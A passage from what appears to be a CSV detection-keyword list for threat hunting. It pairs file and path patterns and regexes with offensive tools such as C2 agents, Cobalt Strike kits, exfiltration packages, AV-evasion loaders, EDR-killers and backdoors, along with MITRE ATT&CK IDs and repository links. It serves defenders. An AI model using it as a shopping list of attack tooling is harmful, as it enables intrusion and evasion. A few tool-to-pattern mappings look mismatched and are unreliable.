TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/AthenaTests/*.*",".{0,1000}\/AthenaTests\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/AtlasReaper.git*",".{0,1000}\/AtlasReaper\.git.{0,1000}","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","232","26","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" "*/atomizer.py*",".{0,1000}\/atomizer\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","9","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*/AtomLdr.git*",".{0,1000}\/AtomLdr\.git.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","599","83","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" "*/attackercan/*",".{0,1000}\/attackercan\/.{0,1000}","offensive_tool_keyword","Github Username","github Penetration tester repo hosting malicious code","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/attackercan/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/AttackerMITM.py*",".{0,1000}\/AttackerMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/attacks/*.py",".{0,1000}\/attacks\/.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/AttackServers/*",".{0,1000}\/AttackServers\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/AttackSurfaceMapper.git*",".{0,1000}\/AttackSurfaceMapper\.git.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "*/AtYourService.exe*",".{0,1000}\/AtYourService\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/audio/exfiltrator.py*",".{0,1000}\/audio\/exfiltrator\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/Augustus.git*",".{0,1000}\/Augustus\.git.{0,1000}","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","127","26","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" "*/auth/cc2_auth.*",".{0,1000}\/auth\/cc2_auth\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*/auth-owners.nse*",".{0,1000}\/auth\-owners\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/auth-spoof.nse*",".{0,1000}\/auth\-spoof\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/autobloody.git*",".{0,1000}\/autobloody\.git.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*/autobloody/archive*",".{0,1000}\/autobloody\/archive.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*/AutoBypass.ps1*",".{0,1000}\/AutoBypass\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*/AutoRecon.git*",".{0,1000}\/AutoRecon\.git.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/AutoSmuggle.git*",".{0,1000}\/AutoSmuggle\.git.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*/AutoSUID.git*",".{0,1000}\/AutoSUID\.git.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","1","N/A","7","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*/autotimeliner*",".{0,1000}\/autotimeliner.{0,1000}","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","121","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" "*/auxiliary/scanner/*",".{0,1000}\/auxiliary\/scanner\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/avet.git*",".{0,1000}\/avet\.git.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*/avet_fabric.py*",".{0,1000}\/avet_fabric\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/avet_script_config.sh*",".{0,1000}\/avet_script_config\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*/avoid_badchars.py*",".{0,1000}\/avoid_badchars\.py.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*/avred.git*",".{0,1000}\/avred\.git.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*/avred.py*",".{0,1000}\/avred\.py.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*/avred.py*",".{0,1000}\/avred\.py.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*/avredweb.py *",".{0,1000}\/avredweb\.py\s.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*/awesome-burp-extensions/*",".{0,1000}\/awesome\-burp\-extensions\/.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","9","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*/awesome-pentest*",".{0,1000}\/awesome\-pentest.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/aws__enum_account*",".{0,1000}\/aws__enum_account.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/aws__enum_account/main.py*",".{0,1000}\/aws__enum_account\/main\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/AWS-Loot*",".{0,1000}\/AWS\-Loot.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","69","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*/Azure-AccessPermissions.git*",".{0,1000}\/Azure\-AccessPermissions\.git.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","1","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*/AzureC2Relay*",".{0,1000}\/AzureC2Relay.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*/AzureHound.ps1*",".{0,1000}\/AzureHound\.ps1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/B374K*",".{0,1000}\/B374K.{0,1000}","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2329","742","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" "*/BabelStrike.git*",".{0,1000}\/BabelStrike\.git.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","2","110","22","2023-12-16T13:51:54Z","2023-01-10T07:59:00Z" "*/BabelStrike.py*",".{0,1000}\/BabelStrike\.py.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","2","110","22","2023-12-16T13:51:54Z","2023-01-10T07:59:00Z" "*/BabyShark.git*",".{0,1000}\/BabyShark\.git.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1102.002 - T1071.001 - T1132.001 - T1027 - T1043 - T1573.002","TA0006 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","10","10","174","28","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z" "*/BackDoor*",".{0,1000}\/BackDoor.{0,1000}","offensive_tool_keyword","_","keyword observed in multiple backdoor tools","T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/backdoor.bat*",".{0,1000}\/backdoor\.bat.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*/backdoor.exe*",".{0,1000}\/backdoor\.exe.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*/backdoor.py*",".{0,1000}\/backdoor\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*/backdoor/traitor.go*",".{0,1000}\/backdoor\/traitor\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*/backdoor_all_users.py*",".{0,1000}\/backdoor_all_users\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/backdoor_apk*",".{0,1000}\/backdoor_apk.{0,1000}","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8922","2233","2024-03-17T12:09:38Z","2016-07-24T10:30:19Z" "*/backoff.profile*",".{0,1000}\/backoff\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/backorifice-brute.nse*",".{0,1000}\/backorifice\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/backorifice-info.nse*",".{0,1000}\/backorifice\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Backstab.git",".{0,1000}\/Backstab\.git","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*/Backstab/Backstab*",".{0,1000}\/Backstab\/Backstab.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*/backstab_src/*",".{0,1000}\/backstab_src\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 